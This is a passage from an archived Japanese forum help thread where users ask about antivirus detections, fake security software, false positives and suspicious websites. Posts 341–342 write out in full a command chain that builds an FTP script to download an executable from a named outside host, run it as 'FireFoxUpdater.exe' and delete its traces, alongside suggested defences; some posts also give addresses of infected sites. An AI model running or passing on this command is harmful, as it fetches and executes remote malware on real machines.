262名無しさん@お腹いっぱい。2008/12/23(火) 18:17:05
ADWBJC?なんたらのウイルスにより、インターネットアクセスできません。手動で削除してくれと書いてますが、どうすれば…わかる方いますか?
263名無しさん@お腹いっぱい。sage2008/12/23(火) 19:38:09
>>262
>>1
俺たちはエスパーではない
264名無しさん@お腹いっぱい。sage2008/12/23(火) 22:03:02
>>261
FWを無効にするものもあるんですか・・・
この機会に何か入れたいと思います
265名無しさん@お腹いっぱい。sage2008/12/27(土) 09:41:43
ウイルスや自らの操作(再起動のところをクリックする等)以外でも
パソコンが強制的に再起動させられたりしますか?
266名無しさん@お腹いっぱい。sage2008/12/27(土) 09:46:58
211 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/12/27(土) 09:14:13
ウイルスや自らの操作(再起動のところをクリックする等)以外でも
パソコンが強制的に再起動させられたりしますか?
267名無しさん@お腹いっぱい。2008/12/27(土) 20:22:58
すでに廃業しているコムスンの公式HPを閲覧すると
トロイの木馬を送り込まれるようです。
こんなサイト放置しているのは危険だと思うので
あえて挑戦できるPC環境の方は
確認して、所定の機関に通報してください。

【感染する疑いのあるサイト⇒】ttp://www.comsn.c o m
268 ◆N9P3SuvBPo sage2008/12/27(土) 20:58:13
>267
行って来た
真っ白なページ
んで、ソース見たら怪しげなコードが…
JavaScriptを切っていれば無害?
269名無しさん@お腹いっぱい。sage2008/12/28(日) 02:05:34
>>267
アグスによる調査結果(事業閉鎖の案内は確認できる)
ttp://www.aguse.jp/?m=w&url=124.146.222.167&x=35&y=2

該当HPソース内の<head>...%エスケープされた難読化ファイル...</head>
間のスクリプト調査結果。
ttp://www.virustotal.com/jp/analisis/6d6eb4129e5ed458e7588b0a8c92a001

検出された、トロイの木馬の説明(以下説明の新種と思われる)
ttp://www.f-secure.co.jp/v-descs/v-descs3/JS-Agent-D-jp.htm

サーバホスティングサービス(株式会社NTTPCコミュニケーションズ)
技術サポートに報告しました。

virustotalの結果を見ると、新種のようで少数のベンダーしか検出出来ていないの
で踏むのは危険ですねぇ。マジ迷惑な会社ですね。消え去った後も悪意をばらまい
ている
270名無しさん@お腹いっぱい。sage2008/12/28(日) 04:12:07
デコードしてみたけど、何も無かった。
271名無しさん@お腹いっぱい。sage2008/12/28(日) 20:26:42
なんだなんだ。
272名無しさん@お腹いっぱい。2008/12/30(火) 00:22:18
>>269
>>270
ご対応ありがとうございます。
しかし宣伝するわけではないけどアンチウィルスソフト
(Win Live OneCare)が検出してくれて助かった。



273名無しさん@お腹いっぱい。2008/12/30(火) 02:42:46
【使用OS】 「XPホームエディション」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「カスペルスキー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「○」
【スパイウェア対策ソフト】 「?上記」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「有」

現在の状況:興味でえっちなアングラサイトを見てしまったらトロイやらワームやらてんこ盛りで感染
カスペルスキーでスキャン駆除をする前に
Windows Security Centerがピコピコ光ってたのでなんだろうとクリック
Antivirus2009に誘導されインストールを安易に触ってしまったら
貴方のPcは242個の脅威に感染してますから課金してねというページが表示
カスペルスキーあるからそっちで駆除してもらったのですが
その後もセキュリティセンターの「242個の警告」と、Antivirusの課金ページが勝手に表示されます・・・
ゲームや作業しててもいきなり表示されてそのたびに中断されてしまう状態で
削除したくともソレに該当する項目も無く
アプリの追加削除にも該当ナシで困ってます。
274名無しさん@お腹いっぱい。sage2008/12/30(火) 03:01:20
>>273
http://pc11.2ch.net/test/read.cgi/sec/1216540253/
http://pc11.2ch.net/test/read.cgi/sec/1162464139/
275名無しさん@お腹いっぱい。sage2008/12/30(火) 22:05:09
【使用OS】 「XP Home sp2」
【Microsoft Update(MU)の状態】 「sp3への更新をしてない状態」
【使用セキュリティソフトとバージョン】 「avast4.8Home」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「Spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「ついさっき入れたばかり」
【ルータの有無】 「有」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Win32:SysPatch[Wrm]」
昨日うっかりあやしいページを踏んで感染
その後起動するたびにavastがウイルス発見しますた!!といちいちアラートを出すのだが、
SYSTEM32内USER32.DLLに感染しているみたいで削除も修復もチェストもなんにもできない
ググってみてもそれらしい項目が出てこないしで困った
avastのことだから誤検出かと思ったんだが気味が悪い
276 ◆N9P3SuvBPo sage2008/12/30(火) 23:38:23
>275
正規ファイルのc:\windows\system32\user32.dllに感染か?
さらに詳細を知りたいので、↓のサイトでこのc:\windows\system32\user32.dllをスキャンして
スクリーンショットを取って結果をうpろだに上げてください。
ttp://www.virustotal.com/jp/
277名無しさん@お腹いっぱい。sage2008/12/30(火) 23:52:51
>>276
システム上重要なファイルなのか知らないが、
0 bytes size received / Se ha recibido un archivo vacio
と表示されるだけで他は何もでなかった
インストールして送るソフトも使ったが駄目だった
でもavastやらウイルスバスターでオンラインスキャンしたら、
相変わらず何の処理も選べなかったけど今は再起動しても何故かavastは騒がなくなったわ
278 ◆N9P3SuvBPo sage2008/12/30(火) 23:59:17
>277
なんだったんだろうね?
もう一度c:\windows\system32\user32.dllのファイルサイズを教えてください。
279名無しさん@お腹いっぱい。sage2008/12/31(水) 00:05:40
>>278
サイズは
574,976 バイト

ディスク上のサイズは
574,536 バイト
ってなってました
280 ◆N9P3SuvBPo sage2008/12/31(水) 00:21:34
>279
環境によるかもしれないけど俺は
サイズ=574,464バイト
ディスク上のサイズ=577,536バイトですね

作成日時は2005年12月22日、19:05:40
更新日が2005年3月3日、3:09:44ですね

常駐してる対策ソフトが検出しなくなったのなら、
たぶんもう大丈夫だろう。
281名無しさん@お腹いっぱい。sage2008/12/31(水) 01:23:42
>>280
安心していたのもつかの間、またavastが騒ぎ出しました
なんで修復できないのかなって思ってたら読み取りモードだったかららしい
とりあえずuser32.dllをコピーして別の場所へ移してから読み取りモードを外してさっきのURLを再チャレンジ
結果が長くてどこまでスクショとればわからなかったけど一応これで…
http://www.e-kuraberu.net/uploader/src/kuraberu7608.jpg.html
282名無しさん@お腹いっぱい。sage2008/12/31(水) 01:34:58
あっ281のパス忘れてた 4109です
283 ◆N9P3SuvBPo sage2008/12/31(水) 02:54:50
>281
複数のベンダーが検出してるとこ見ると、誤検出ではないですね。
正規ファイルの感染…どう対応しようか?

system32内にuser32.dllありますよね。
通常モードのまま(セーフモードなら一旦再起動して通常モードで立ち上げる)
名前をuser32.bakにリネームしてください。
しばらく待っても、user32.dllが作成されないようなら
user32.bakをuser32.dllに戻してください。
284名無しさん@お腹いっぱい。sage2008/12/31(水) 05:30:32
ttp://dropfile.freehostia.com/house/house.html

バーボンハウスって名前のブラクラ?サイトなんですが
ウィンドウが沢山開くわけでもなく、何をやってるのかよくわかりません
このサイトは何をしてくるのでしょうか?
285名無しさん@お腹いっぱい。sage2008/12/31(水) 05:59:57
>>284
完全にスレ違いだが
そこにアクセスすると何回も強制的にページを読み込まされる。
するとPCに負荷がかかるわけだが、自分の環境では特に被害は無い。

窓やタブを大量に開くだけがブラクラってわけじゃない
ブラクラって分かってるのなら安易に踏まないように。
286名無しさん@お腹いっぱい。sage2008/12/31(水) 06:08:01
スレ違いすいませんでした
よくわかりました、ありがとうございました
287名無しさん@お腹いっぱい。sage2008/12/31(水) 12:39:30
>>283
user32.dllをuser32.bakに変えたらちゃんとuser32.dllが作成されました
サイズを調べたら283さんと同じ574,464バイト、ディスク上が577,536バイトに戻っていました
作成されたdllをスキャンしても何も反応はなかったので恐らく正常な形になったんだと思います
その後再起動してみても何もuser32.dllの警告らしきものはでなかったので、先ほどリネームしたbakを削除しましたがこれで処理できたということでしょうか
288 ◆N9P3SuvBPo sage2008/12/31(水) 13:11:14
>287
はい、OKです。(Windowsのシステム保護機能が効いたようです)
あとはAvastで全ドライブをスキャンして、何も検出されなければ解決です。
それと

>とりあえずuser32.dllをコピーして別の場所へ移してから
別の場所に移動したuser32.dllのコピーも削除してください。
289名無しさん@お腹いっぱい。sage2009/01/04(日) 23:19:56
テンプレ使用ご容赦下さい

キンタマや山田ウィルス等のウィルス対策として、プライベートなフォルダをEFSで暗号化すれば流出してもファイルを読み取られる事は無いのでしょうか?
290名無しさん@お腹いっぱい。sage2009/01/04(日) 23:43:39
キンタマ、山田ウイルスは板違い。
てかマルチ市ね。
291名無しさん@お腹いっぱい。sage2009/01/05(月) 02:19:26
>>289
>>92
292名無しさん@お腹いっぱい。sage2009/01/07(水) 00:21:16
【使用OS】 「WINDOWSXP」
【Microsoft Update(MU)の状態】 「何スかそれ・・」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「多分してます」
【スパイウェア対策ソフト】 「えぇ・・ウィルスバスターじゃだめスか・・?;」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「1週間に2回ほど」
【ルータの有無】 「不明」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「脅威名:Cookie DoubleClick」
「危険度:中」
「種類 :WebブラウザのCookie」

なんか正月明けくらいに18禁サイトまわったあとにウィルス検索したらこいつが出てきて
それから今日検索してみたらまたこいつが弾かれてました;
でも今日まで18禁サイトとか行ってないのになんでまた感染してるのか全くわかりません
何かに入っちゃってるんでしょうか?

対処策あったら教えてくださいm(__;)m
293名無しさん@お腹いっぱい。sage2009/01/07(水) 00:26:44
今また検索してみたらDoubleClickとAdvertisingとかいうのも増えちゃってますが・・・
やばいですかね?;
294名無しさん@お腹いっぱい。sage2009/01/07(水) 00:48:58
全部cookieを利用したスパイウェア。
スパイウェアといっても個人情報を盗んだりはしないが、PCが重くなったりはするかも。
サードパーティーのcookieを拒否すれば大抵のものは弾けると思う。

そんなことより
>【Microsoft Update(MU)の状態】 「何スかそれ・・」
今すぐやって来い。詳細はググれ。
295名無しさん@お腹いっぱい。sage2009/01/07(水) 08:14:09
了解です!
296名無しさん@お腹いっぱい。2009/01/07(水) 18:34:19
TrackingCookieはスパイウエアじゃねえが・・・・・・
297名無しさん@お腹いっぱい。sage2009/01/07(水) 20:55:23
【使用OS】 「xp pro sp3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウイルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「済」
【スパイウェア対策ソフト】 「ウイルスバスター2009」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「済」
【ルータの有無】 「有」

今日行った検索でTROJ_Generic.DITというものが見つかりました
以下のものに感染していたようです

wingogo.ex_ 
CyberLink\PowerDVD\Language\Enu\pdvd7_dvdaudio\pdvd7_dvdaudio.html
CyberLink\PowerDVD\Language\Kor\pdvd7_dvdaudio\pdvd7_dvdaudio.html
compile\petit\readme_e.html

感染ファイルは隔離後に削除してます
その後の手動検索ではみつかってません
TROJ_Generic.DITがどんなウイルスなのか検索してもうまく見つからず
削除しとけば安心なのか心配です

対策法をご教授いただけたらと思います
298名無しさん@お腹いっぱい。sage2009/01/07(水) 21:32:56
>>297
隔離したファイルはすぐに削除せずにしばらく様子見した方がいいよ
実は誤検知で、数日後に定義の修正があること多いからね

VirusTotalとかJotti's malware scanを利用するといい
299名無しさん@お腹いっぱい。sage2009/01/07(水) 21:47:59
個人情報が入っているファイルがあって、それはWinRARでパスワードを掛けて圧縮していて
編集するときは、一時的にTempファイルに解凍した状態でファイルに保存することなく編集するようにしています
それが、いつのまにか勝手にデスクトップに解凍されているという現象が今までに2度ほど起きているのですが、
これはトロイ等に感染していると思ったほうがいいのでしょうか?
ノートンを使用しているので、ノートンでスキャンを行うも2度とも検出されませんでした
非常に不安になり2度とも変更が必要と思われる情報は変更を行ったのですが今のところ実害はない状態です
300名無しさん@お腹いっぱい。sage2009/01/07(水) 22:33:25
すみません、テンプレ読んでませんでした。
どうかよろしくお願いします。

【使用OS】 Windows XP Pro SP3
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 Norton Internet Security (10.2.0.30)
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「無し」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「無し」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「検出されませんでした」


301名無しさん@お腹いっぱい。sage2009/01/07(水) 22:33:56
299=300です
302名無しさん@お腹いっぱい。2009/01/08(木) 23:44:00
trdhost.exe とは何者でしょうか?rdhost.exeではなく tdrhost.exeでした。
Googleで調べても出てこず,不安になって消しましたが,いったい何だったのか逆に不安になってきました。

回線が上りも下りも微妙に使っている状態だったので不審に思いタスクマネージャをみると,CPU使用率が1〜3になっては0になる不振なexeを見つけました。
それがtrdhost.exeなのですが,窓の手を見る限りスタートアップではないし,ウイルスバスターも反応せず,そもそも情報がないということで気味が悪いです。
消したら不振なデータ移送は止まりましたが,不安です……
どなたかtrdhost.exeについてご存じの方は,お教えください……

【使用OS】 「Win XP pro SP3」
【使用セキュリティソフトとバージョン】 「セキュリティ対策ツール Ver. 1.5 (ウイルスバスター?)」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「上記のものがが兼ねてると思う」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「YES」
【ルータの有無】 「NTT光プレミアムから借りてるルーター」
303 ◆N9P3SuvBPo sage2009/01/09(金) 01:00:29
>302
tdrhost.exeのプロパティを見れば、大まかな情報は分かる
怪しいと思ったらvirustotalでスキャンして正体を突き止める
304名無しさん@お腹いっぱい。sage2009/01/09(金) 01:45:51
tdrなのかtrdなのか
3053022009/01/09(金) 01:54:51
>>303-304 trdです。C:\WINDOWS\Prefetch 内に TRDHOST.EXE-2EAF3965.pf がありましたが,本体とおぼしき物は見つかりませんでした。
これをVirustotalでスキャンしましたが,何も反応はありませんでした。
取りあえず今のところは問題ないので,様子を見てみようと思います。ありがとうございました。
306名無しさん@お腹いっぱい。sage2009/01/09(金) 13:25:36
>>297
自分もウイルスバスターで同じものでました。
一週間前にスキャンして終了してから初起動した時に検出されたんで誤検知を疑ってます。
307名無しさん@お腹いっぱい。sage2009/01/09(金) 19:08:09
>>299
WinRARは機能豊富だから、オペミスでは?気になるなら複数のベンダーでオンラインスキャン
してみると良いよ。

>>305
プリフェッチファイル(pf)は本体と別の形式だから、それ調べてみても詳細は判らないよ。
よく「消してしまった」の後で、ウイルスですか?質問多いけど、隔離されてるなら心配な
いから、303の言うようにまず調べてみるのがよいね。
308302sage2009/01/10(土) 00:15:20
Windows/system32/trdhost.exe が犯人だと分かりましたが,System32フォルダを覗いてもそれはありませんでした。
とりあえずパスをvirustotalに打ち込むと何やらアップロードしたら,いくつかの検査ソフトが反応していました。
しかし『隠しファイルを表示する』にしてもtrdは見えず,消すことが出来ません。
プロセスに表示されるので存在するのでしょうが……
またあれから注意深く監視してみましたが,勝手に送受信するようなことはありませんでした。
なので時限爆弾を抱えてるつもりで,ウイルスとして判断されるまで付き合っていくしかありません……
309名無しさん@お腹いっぱい。sage2009/01/10(土) 00:29:32
ファイルとレジストリは隠すのに、プロセスを隠さないルートキットなんてあるの?
310名無しさん@お腹いっぱい。sage2009/01/10(土) 00:41:32
間抜けなルートキットなんだろ
SafeModeで見えますとかまれによくある
311名無しさん@お腹いっぱい。sage2009/01/10(土) 00:50:15
> まれによくある
どっちだよw

とりあえず、>>308はルートキットスキャナを使ってみた方がいいな。
312名無しさん@お腹いっぱい。sage2009/01/10(土) 17:25:04
>>297
それ私も検知されました。
一週間前に検索したところ、反応なかったのですが…
今は隔離させています。

てか、セキュリティダッシュボード上では検知されてないのですよね。
313名無しさん@お腹いっぱい。sage2009/01/11(日) 10:06:43
>>297
うちもそれでたよ
前に検索した時は検出されなかったんだけど
今は>>312と同じで隔離中です
隔離する前に、シマンテックのオンラインスキャンかけたら、検出はされなかったです
314名無しさん@お腹いっぱい。sage2009/01/11(日) 13:44:41
★質問用テンプレ★
【使用OS】 「WindowsXP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast! バージョン4.8-1296」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「Spybot-Search&Destroy」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】

・DoubleClick
・KGBkeylogger
・Microsoft.Windows.Explorer
・Microsoft.WindowsSecurityCenter.TaskManager
・Right Media

Spybot-Search&Destroyで何度削除しても検知されます。
315名無しさん@お腹いっぱい。sage2009/01/11(日) 14:58:32
>>297
わたしも8日にウイルスバスターで検知されました。
始めてウイルス検知されたもんで(バスター2年使用)
あせって感染ファイルを確かめずに削除してしまいました…
その後手動検索しましたが何も検知されません。
大丈夫なのでしょうか。
316名無しさん@お腹いっぱい。2009/01/11(日) 20:04:23
【使用OS】 「XP home sp2」
【Microsoft Update(MU)の状態】 「最近やってません」
【使用セキュリティソフトとバージョン】 「ノートンインターネットセキュリティ2007を一年延長してます」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【ルータの有無】 「NTTのを使用」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】

マイスペやってたら変な所をクリックしたらしく
stabilityinternetscan.comというサイトに飛ばされ、「ウイルス感染してるから
セキュリティソフトをダウンロードしろ」とメッセージが出たので「いいえ」を
クリックして接続切ったんですが、ノートンでチェックしても異常は出ず、ググッたら
ttp://www.precisesecurity.com/blogs/2009/01/11/stabilityinternetscancom/
ttp://www.precisesecurity.com/blogs/2008/12/23/system-security/
「System security」というソフトをインストールさせるための騙しサイト
らしいとわかりました。
ユーザーの書き込みをみるとポップアップが出て来るようですが私のPCには
出て来ません。
これは感染せずに済んでいるんでしょうか?
余計なクリックせずに接続切ればよかったんでしょうが「いいえ」をクリックして
しまったので気になります。
ノートンのウイルスリストには入ってなくて感染してるかどうかがわからないんです。

317名無しさん@お腹いっぱい。sage2009/01/11(日) 20:40:38
>>316
exeをダウンロードして実行していなければ問題なし
318名無しさん@お腹いっぱい。2009/01/11(日) 21:24:42
>>317
ありがとうございます、安心しました。
319名無しさん@お腹いっぱい。2009/01/12(月) 22:10:53
最近インターネットにアクセスすると
蜘蛛のアニメーションが出てくるようになりました
画面上を動き回ります。
こいつの影響なのか接続も遅くなったようです
スキャンでは検出されません
何か良い解決策を教えてください
320名無しさん@お腹いっぱい。sage2009/01/13(火) 00:47:48
使用OS】 Windows XP
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ウイルスバスター2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 済
【スパイウェア対策ソフト】 ウイルスバスター2009
【スパイウェア対策ソフトの更新は定期的に行なっているか】 済
【ルータの有無】 有

外付けHDDをチェックしたところTROJ Generic.DITが検出されました
トロイの木馬の一種のようですがググってもよく分かりません
これがどのような悪さをするのかご存知の方、教えてください
321名無しさん@お腹いっぱい。sage2009/01/13(火) 01:21:31
マルチウゼー
322名無しさん@お腹いっぱい。sage2009/01/13(火) 02:37:58
>>320
マジレスするとJavaScript関係、キャッシュを消せば解決
323名無しさん@お腹いっぱい。sage2009/01/13(火) 03:17:18
>>320
ドライブの復元ポイントに忍び込んでるタイプ。復元ポイントを削除すれば消える
324初心者2009/01/13(火) 19:18:16
RemoteAdmin.Win32.RemotelyAnywhere.o
ってウイルスを検知したんですがどんな悪さをするか教えて欲しいです。
御願いします。
325名無しさん@お腹いっぱい。sage2009/01/13(火) 22:54:25
>>324
今出てる具体的な症状をできるだけ詳細に述べてくれ。ただ個人的にはRemoteAdmin、RemotelyAnywhereってので何となく想像できる
326名無しさん@お腹いっぱい。sage2009/01/13(火) 22:57:34
>>319
OS再インスコも覚悟。スキャンで検出できず自力での削除も不可能なら危険、データが無事なうちに早めにする。そのうちブルーの画面が出てPCが攻撃されてますって英語で出てくることもある。
327名無しさん@お腹いっぱい。2009/01/13(火) 23:40:16
>>326
やっぱ有名なウイルスなんでしょうか?
蜘蛛のアニメが画面上に出てくるって
超冷や汗ものですよ
リカバリってことですよね
ありがとうございました
328名無しさん@お腹いっぱい。sage2009/01/14(水) 01:25:47
>>327
名前忘れたけど厄介だってのは知ってる。デスクトップに置いてあるデータも被害なく外付けに退避させられるからいいものの・・
確かに超冷や汗ものの一つだな。関わりたくないものの一つだ

こいつはダウンロードものに感染してるんじゃなくて海外サイト経由でひっかかるタイプだった気がする。
未知の海外サイト見る時はaguse gatewayを使った方が無難。危険なところも安全に見れる
今後の参考にしてくれ。多分最近見たサイトのどれかのはずだ
329名無しさん@お腹いっぱい。sage2009/01/14(水) 01:31:28
【使用OS】 Windows XP pro
【Microsoft Update(MU)の状態】 sp3にしてない状態
【使用セキュリティソフトとバージョン】 カスペアンチウイルス2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 有
【スキャンの結果】検出なし

最近system32にb33r06hF.exe.a_aとかmqM471x7.exe.a_aというファイルがたびたび出現します。
mqM471x7の方ができた場合、IEが自動起動・自動closeが3分おきくらいに繰り返されます。
スパイウェアなような気もしますが、
ぐぐっても特に情報が見つからなかったため、とりあえずこちらに書かせていただきました。
もし何かご存知の方おりましたら、情報いただけませんか?
330名無しさん@お腹いっぱい。sage2009/01/14(水) 02:04:57
>>329
ttp://www.google.co.jp/search?hl=ja&rlz=1T4GGLJ_jaJP256JP264&q=exe.a_a&btnG=%E6%A4%9C%E7%B4%A2&lr=lang_ja
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_FIRU.BG&VSect=T
331名無しさん@お腹いっぱい。sage2009/01/14(水) 09:55:15
>>330
どうもありがとうございます。
ファイル名でなく、拡張子で検索すればよかったんですね・・・
332名無しさん@お腹いっぱい。sage2009/01/14(水) 20:08:26
>>297
私のPCでも検出されましたので、トレンドマイクロに連絡しました。
今日メールで、「誤検出であったため最新のパターンファイルで対応した」との回答があり、
検索したら出なくなりました。
333名無しさん@お腹いっぱい。sage2009/01/14(水) 22:08:13
>>332
320と同じやつだな。DITだから誤検出か未知のウィルスか迷っていたが・・
結局気分悪いんで消しちまった。結構な数の人が検出されてたらしい
334通りすがり2009/01/14(水) 23:26:11
私もこの〔TROJ_Generic.DIT〕が名無しさんと同じファイル
〔午後のこ〜だ〕と〔CyberLink PowerDVD〕+〔ジャストシステム〕で検出されましたので
トレンドマイクロに問い合わせ、指示に従いそのファイルを添付して調べてもらったところ
下記のような回答が来ました。
*****************************
今回検出されたファイルにつきましては、弊社にて解析の結果、
正常なファイルであると確認できましたので、ウイルスバスターの
誤検出となります。
現在はパターンファイル[5.767.50]にて修正済ですので、アップデート
を行っていただき検出されないか、ご確認いただきますようお願い
いたします。
*****************************
と言うことでしたので、実行するとすべてOKでした。
ウイルスバスター2009の誤検出だっただけのようです。

335名無しさん@お腹いっぱい。sage2009/01/15(木) 00:59:31
すみません。
WORM-VB.Ciiというウイルスがウイルスバスターで検出されたんですが、
どんな悪さをするんでしょうか?
目立った不具合は特にないのですが、パソコン(今年で五年目)の動きが遅く感じます。
教えてください。よろしくお願いいたします。
336名無しさん@お腹いっぱい。sage2009/01/15(木) 10:47:32
ウイルスバスターの検出名じゃないと思うんだが。
337初心者2009/01/15(木) 11:19:36
>>325さん
具体的な被害はないねんけど、ウィルスセキュリティをかけたら感染してますって出たんです。
実害はないんですが一応感染してる物をアンインストールしてもう一回セキュリティをかけたら出てこなくなりました。
もう大丈夫なんかな?
338名無しさん@お腹いっぱい。sage2009/01/15(木) 11:24:20
>>335
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_VB.CII&VSect=T
最近流行りのUSBメモリなどを介して感染するウイルス。
339名無しさん@お腹いっぱい。sage2009/01/15(木) 12:34:39
Uかよ…・
340名無しさん@お腹いっぱい。sage2009/01/15(木) 12:52:16
>>335これってキンタマとか山田とか苺キンタマみたいな悪質なもの?
341名無しさん@お腹いっぱい。2009/01/15(木) 14:02:11
既出だったらごめんよ。
たまーにググるとヒットする「FireFoxUpdater.exe」の情報。
winmgmt(Windows Management Instrumentation)のセキュリティーホールを突い
て外部から潜り込ませるらしい。
以下詳細

まず、外部からwinmgmtを使って以下のコマンドを実行する。
cmd /c echo open b.nvgao.cn>%WINDIR%\WindowsGard&& echo hai
>>%WINDIR%\WindowsGard&& echo 123
>>%WINDIR%\WindowsGard&& echo binary
>>%WINDIR%\WindowsGard&& echo get 8888888888888.exe %WINDIR%\FireFoxUpdater.exe
>>%WINDIR%\WindowsGard&& echo bye
>>%WINDIR%\WindowsGard&& echo del %WINDIR%\WinA.bat
>>%WINDIR%\WinA.bat&& echo ftp -s:%WINDIR%\WindowsGard>%WINDIR%\WinF.bat&& echo %WINDIR%\FireFoxUpdater.exe
>>%WINDIR%\WinF.bat&& echo del %WINDIR%\WindowsGard
>>%WINDIR%\WinF.bat&& echo cmd /c %WINDIR%\WinA.bat
>>%WINDIR%\WinF.bat&& echo del %WINDIR%\WinF.bat
>>%WINDIR%\WinF.bat&& %WINDIR%\winF.bat

※ 実際は改行無しの一行
わかる人はわかると思うが、上記の一行で以下の3つのファイル%WINDIR%(通常はC:\WINNTだね。)が作成され、、、
WinA.bat
WindowsGard
WinF.bat
342名無しさん@お腹いっぱい。2009/01/15(木) 14:03:09
>>341続き
最後にWinF.batが実行される。
そしてこのWinF.batが(上記を見れば分かると思うがw)

ftp -s:C:\WINNT\WindowsGard
C:\WINNT\FireFoxUpdater.exe
del C:\WINNT\WindowsGard
cmd /c C:\WINNT\WinA.bat
del C:\WINNT\WinF.bat

ftp -sでコマンドファイルを指定している。そしてWindowsGardの中身が(上記を見れば分かると思うがw)

open b.nvgao.cn
hai
123
binary
get 8888888888888.exe C:\WINNT\FireFoxUpdater.exe
bye

分かる人は、b.nvgao.cnで暴るのも(ry
で、FireFoxUpdater.exeをゲット完了後に即実行し・・・・
後はもうやりたい放題にやられちゃうと思います。

防御方法
Windows Management InstrumentationとWindows Management Instrumentation Driver Extensionsのサービス
を無効にする。
ftpコマンド名を変更する(moeftp.exeとかww)

343名無しさん@お腹いっぱい。sage2009/01/15(木) 14:44:53
>>342
FireFoxUpdater.exeという名前のウィルスなのですか?
344名無しさん@お腹いっぱい。sage2009/01/15(木) 15:18:23
うわぁ・・・
345名無しさん@お腹いっぱい。sage2009/01/16(金) 00:49:31
マルウェア対策でフリーソフトのcomodo boなんとかっての使っているが常駐でウップデートした奴を勝手に削除する素晴らしい糞です。
346名無しさん@お腹いっぱい。sage2009/01/19(月) 12:15:08
347名無しさん@お腹いっぱい。sage2009/01/20(火) 18:09:02
質問させて頂きます。
今まで使用してきたESET SmartSecrityの期限が切れまして、
PCを購入した為1ライセンスで2台使用できるセキュリティソフトを探しております。

PCの用途は専らオンラインゲームか動画鑑賞のみです。
メインPCのCPUはCore2Duo E8600で、メモリは4Gです。
サブPCはAthlon 64 X2 3800+のメモリ1Gです。

今まではサブをメインとして使用しており、そちらにセキュリティソフトを入れていました。
なので現在はメインPCにESET SmartSecrityの体験版、サブPCに期限切れのESET SmartSecrityを入れています。
サブPCは毎日起動しないので、もし無料のavast等でも事足りるのであれば、
メインに有料のソフト、サブに無料ソフトでもかまいません。

オンラインゲームをやることが非常に多いので、アカウントハック等を防げたらいいのですが・・・
PCに関しての知識は疎いので、あまり深いところまではわかりません。

長文・乱文で申し訳ありませんが、どうかよろしくお願いいたします。

【使用OS】 WindowsXP Home SP3
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ESET SmartSecrity
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 ESET SmartSecrity
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 あり
348名無しさん@お腹いっぱい。sage2009/01/20(火) 18:34:00
>>347
3PC版なら結構いろんな所から出てると思うが
 F-Secure、ノートン、OneCare 等々
349名無しさん@お腹いっぱい。sage2009/01/20(火) 23:24:46
>>347
セキュリティーに興味を持って調べてこの板に来たんだからもうちょっと頑張って
性能のいいフリーソフトを使ってみてはどうでしょう(あと若干スレチな気もします)
参考までに↓
【無料】 フリーセキュリティの組合せ 9
http://pc11.2ch.net/test/read.cgi/sec/1231757789

ちなみにどんなに頑張っても感染するときは気付かずいつの間にかかかるので
あまり神経質になりすぎてもどうかとは思います。
肝心なのは自分にとって使いやすい、きちんと設定できてなるべく検出率が良い
ソフトを使うことだと思います。

あと個人的にESETはよろしくないかと・・・・
E8600ならガチガチにセキュリティー固めても起動時以外で重さを体感出来ることはないので
軽さで選ぶのはやめたほうがいいと思います。(FPS上級者で1ドット単位で狙える人なら別ですが)
350名無しさん@お腹いっぱい。sage2009/01/21(水) 03:15:27
http://www7a.biglobe.ne.jp/~dokyo/newpage74.html 
↑のアドレスのサイトにとんだ瞬間にW32.Aliz.Wormというウィルスに
感染したとのメッセージが出てきて

コンピューターウイルスW32.Aliz.Wormのダウンロードが完了しました。
このウイルスはハードディスク内のメモリー内を常に移動するようプログラムされているのでウイルスを駆除することは非常に
困難です。又、非常に感染性が高いのでネットワークを通して次から次へと感染ファイルを増やします。尚、このウイルスには
最初のページでの貴方個人情報を載せてありますのでインターネット上に貴方の個人情報を広めます。
プロパイダから損害賠償など多額な請求が来る可能性があります。ダイアルQ2に接続しましたので回線を切断しても
